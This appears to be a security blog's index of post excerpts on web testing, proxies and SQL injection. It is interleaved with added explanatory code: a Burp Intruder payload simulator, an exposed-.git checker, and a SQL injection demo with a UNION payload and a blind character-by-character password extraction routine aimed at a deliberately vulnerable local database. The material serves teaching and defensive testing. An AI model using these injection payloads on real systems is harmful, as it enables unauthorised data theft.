America is wide open and trusting. This shouldn’t change. The idea of stopping…
Mature Visual Analysis
From raffy.ch: Data Collection: No data, no visuals (see also Where Data Analytics…
Who Makes the Best Web Security Testers?
There’s been some debate in my circles recently on the topic of what type…
Three Proxy Options Every Security Pro Should Consider Using
Working in the information security field it’s frequently handy to be able…
Linkclump for Web Testing
Anyone who does web security testing knows that the browser is the most important…
A Response to Dinis Cruz’ Comments on Invisible Security
Dinis Cruz did a presentation at OWASP recently on why security should be invisible…
Why Lock Technology Stagnated for Decades
At BSides-LasVegas this year I saw an exemplary talk on the history of lock technology…
SQL Injection is 90% SQL, WebSec is 90% WebDev
I believe too many people take the wrong approach to security, or “hacking”.…
Life > Fear
I recently decided to give Xobni for GMail a try. It does some wicked integration…
A Social Media Security Model
I am often asked how I handle security while using social networks. This…
Burp Intruder Payload Methods Explained
If you use Burp a good bit you’ve likely run into the question of what precisely…
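The four Intruder attack types differ only in how payloads are distributed across the marked positions. The following is an added example, not code from the post or from Burp itself: a request is modelled as a list of literal fragments and marked positions (each with its base value), and each function returns the list of request strings Intruder would send for that attack type. The template format, the function names and the sample payload sets are assumptions made for the illustration.

```python
from itertools import product
from math import prod

# Constructed request template: ("lit", text) is sent as-is,
# ("pos", base_value) is a marked payload position (Burp's §...§ markers).
TEMPLATE = [("lit", "user="), ("pos", "admin"), ("lit", "&pass="), ("pos", "letmein")]


def positions(template):
    """Indices of the marked positions in the template."""
    return [i for i, (kind, _) in enumerate(template) if kind == "pos"]


def render(template, values):
    """Build one request, substituting `values` (one per marked position)."""
    out, it = [], iter(values)
    for kind, text in template:
        out.append(text if kind == "lit" else next(it))
    return "".join(out)


def sniper(template, payloads):
    """One payload set, one position at a time; the other positions keep
    their base value. Request count = positions * payloads."""
    pos = positions(template)
    base = [text for kind, text in template if kind == "pos"]
    reqs = []
    for target in range(len(pos)):
        for p in payloads:
            values = list(base)
            values[target] = p
            reqs.append(render(template, values))
    return reqs


def battering_ram(template, payloads):
    """One payload set, the same payload in every position at once.
    Request count = payloads."""
    n = len(positions(template))
    return [render(template, [p] * n) for p in payloads]


def pitchfork(template, payload_sets):
    """One payload set per position, walked in parallel (set 1 item k with
    set 2 item k). Request count = length of the shortest set."""
    return [render(template, list(combo)) for combo in zip(*payload_sets)]


def cluster_bomb(template, payload_sets):
    """One payload set per position, every combination tried.
    Request count = product of the set sizes."""
    return [render(template, list(combo)) for combo in product(*payload_sets)]


def request_counts(template, payload_sets):
    """How many requests each attack type sends for the given sets; handy
    for estimating run time before launching an attack."""
    npos = len(positions(template))
    return {
        "sniper": npos * len(payload_sets[0]),
        "battering_ram": len(payload_sets[0]),
        "pitchfork": min(len(s) for s in payload_sets),
        "cluster_bomb": prod(len(s) for s in payload_sets),
    }


if __name__ == "__main__":
    users, passwords = ["a", "b"], ["1", "2", "3"]
    for name, reqs in [
        ("sniper", sniper(TEMPLATE, users)),
        ("battering ram", battering_ram(TEMPLATE, users)),
        ("pitchfork", pitchfork(TEMPLATE, [users, passwords])),
        ("cluster bomb", cluster_bomb(TEMPLATE, [users, passwords])),
    ]:
        print(f"{name}: {len(reqs)} requests")
        for r in reqs:
            print("  ", r)
```

Pitchfork is the one people most often get wrong: it pairs item k of set 1 with item k of set 2, which is what you want for credential pairs from a dump; cluster bomb is the brute-force cross product and its request count grows multiplicatively with each added position.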
How to Connect to an Astaro SSL VPN using OS X
I’ve been stupid for Astaro since the early 00’s and I remain so today.…
Bypassing a Web Proxy Using Chrome on OS X
It’s highly annoying when you are trying to read or download something at…
Determining a Personal Data Retention Strategy
If you have spent any time in the IT world you’re likely to be particularly tuned…
Blog Spam’s Latest Technique: Flattery
Over the last few months I’ve been noticing a trend in blog spam: The use…
How to Use WPA-2 Enterprise in Windows 7
WPA-2 Enterprise is pretty sweet. It allows you to require an Active Directory…
Operating Systems Used by DEFCON CTF Teams [Poll]
I was hanging out in the CTF room today at DEFCON enjoying the hilarious videos…
Restricting Access to Your Git Directory
One task you need to be sure to do when implementing git on a website is to make…
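A quick way to confirm the restriction is actually in place is to request the files that every checkout contains and see whether the web server hands them back. The check below is an added example, not code from the post: it probes `/.git/HEAD` and `/.git/config`, and only counts a hit when the body looks like the real file (a `ref:` line or a commit hash, or a `[core]` section), so a catch-all 200 page is not a false positive. The fetcher is injectable so it can be run against constructed responses offline; the `urllib` fetcher, the probe paths and the sample responses are assumptions for the illustration.

```python
import re
from urllib.request import urlopen
from urllib.error import HTTPError, URLError

# Paths that exist in every .git directory, with a predicate that checks the
# body looks like the genuine file rather than a generic 200 error page.
GIT_PROBES = {
    "/.git/HEAD": lambda body: body.startswith("ref: refs/")
    or re.fullmatch(r"[0-9a-f]{40}\s*", body) is not None,
    "/.git/config": lambda body: "[core]" in body,
}


def urllib_fetch(url, timeout=5):
    """Real fetcher: returns (status, body_text) for a URL."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except HTTPError as e:
        return e.code, ""
    except URLError:
        return 0, ""


def git_exposed(base_url, fetch=urllib_fetch):
    """Return the list of .git paths the server serves with plausible
    content. An empty list means the directory looks restricted."""
    base = base_url.rstrip("/")
    hits = []
    for path, looks_genuine in GIT_PROBES.items():
        status, body = fetch(base + path)
        if status == 200 and looks_genuine(body):
            hits.append(path)
    return hits


# Constructed responses standing in for two hypothetical sites.
FAKE_SITES = {
    "http://exposed.example/.git/HEAD": (200, "ref: refs/heads/master\n"),
    "http://exposed.example/.git/config": (200, "[core]\n\trepositoryformatversion = 0\n"),
    # This site answers every unknown path with a 200 HTML page; the
    # content checks keep that from being reported as an exposed repo.
    "http://catchall.example/.git/HEAD": (200, "<html>Not found</html>"),
    "http://catchall.example/.git/config": (200, "<html>Not found</html>"),
}


def fake_fetch(url):
    return FAKE_SITES.get(url, (403, ""))


if __name__ == "__main__":
    for site in ("http://exposed.example", "http://catchall.example", "http://locked.example"):
        print(site, git_exposed(site, fake_fetch) or "restricted")
```

If the check reports hits, the usual fix is a deny rule for the `.git` path at the web server (for nginx, a `location ~ /\.git { deny all; }` block) or keeping the checkout outside the document root altogether; also remember that a readable `.git/` lets an attacker reconstruct the full source history, not just the current files.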
PayPal and Two-Factor Authentication: A “Weakest Link” Case in Point
I am an enthusiastic user of the Verisign PIP two-factor authentication service.…
Mac vs. PC Security In One Sentence
If you follow Information Security at all or have been part of a PC vs. Mac discussion…
Segmented Web Browsing Will Be the DMZ of the 2010’s
The recent AURORA attack is about to change how the web browser is handled within…
A Fantasy Explanation of Standard vs. Blind SQL Injection
Many in InfoSec get confused about the difference between standard and blind SQL…
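Stripped of the fantasy, the difference is whether the application shows you the query's output or only whether the query succeeded. The following is an added example, not the post's own code: a deliberately vulnerable SQLite lookup built by string concatenation, a standard injection that pulls the password column straight into the result, and a boolean-based blind extraction that gets the same data one character at a time by asking yes/no questions. The schema, the sample rows and the helper names are constructed for the illustration.

```python
import sqlite3


def build_db():
    """Constructed sample database with two users."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    con.commit()
    return con


def vulnerable_lookup(con, user_input):
    """Deliberately vulnerable: user input is concatenated into the SQL."""
    sql = "SELECT name FROM users WHERE name = '" + user_input + "'"
    return [row[0] for row in con.execute(sql)]


def standard_injection(con):
    """Standard (in-band) injection: the query's output is rendered on the
    page, so a UNION brings the password column back in one request."""
    payload = "' UNION ALL SELECT password FROM users--"
    return vulnerable_lookup(con, payload)


def blind_oracle(con, condition):
    """Blind: the page only tells us whether a row came back. The condition
    is ANDed onto a known-good row, so 'row present' means condition true."""
    payload = "alice' AND (" + condition + ")--"
    return len(vulnerable_lookup(con, payload)) > 0


def blind_extract(con, column, row_id, max_len=32):
    """Boolean-based blind extraction of users.<column> for one row, one
    character at a time. Returns (value, number_of_queries)."""
    value, queries = "", 0
    for pos in range(1, max_len + 1):
        found = False
        for code in range(32, 127):  # printable ASCII
            cond = (f"unicode(substr((SELECT {column} FROM users WHERE id={row_id}),"
                    f"{pos},1)) = {code}")
            queries += 1
            if blind_oracle(con, cond):
                value += chr(code)
                found = True
                break
        if not found:  # substr past the end yields '' -> NULL -> no row
            break
    return value, queries


if __name__ == "__main__":
    db = build_db()
    print("standard:", standard_injection(db))
    for uid in (1, 2):
        print("blind id=%d:" % uid, blind_extract(db, "password", uid))
```

The standard attack costs one request; the blind one here costs up to 95 requests per character (a binary search on the code point cuts that to about seven), which is why blind injection is no less severe, only slower. The usual fix applies to both: parameterised queries, never string concatenation.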
4 Ways Terrorist Profiling is Like Antivirus
Both can be bypassed by smart attackers who know they’re being profiled.…
My Twitter Infosec List
I am really looking forward to the potential of Twitter Lists. Here’s my…
Nmap: Use the --top-ports Option for Both TCP and UDP Simultaneously
I’m a big fan of nmap’s --top-ports option, which gives you the…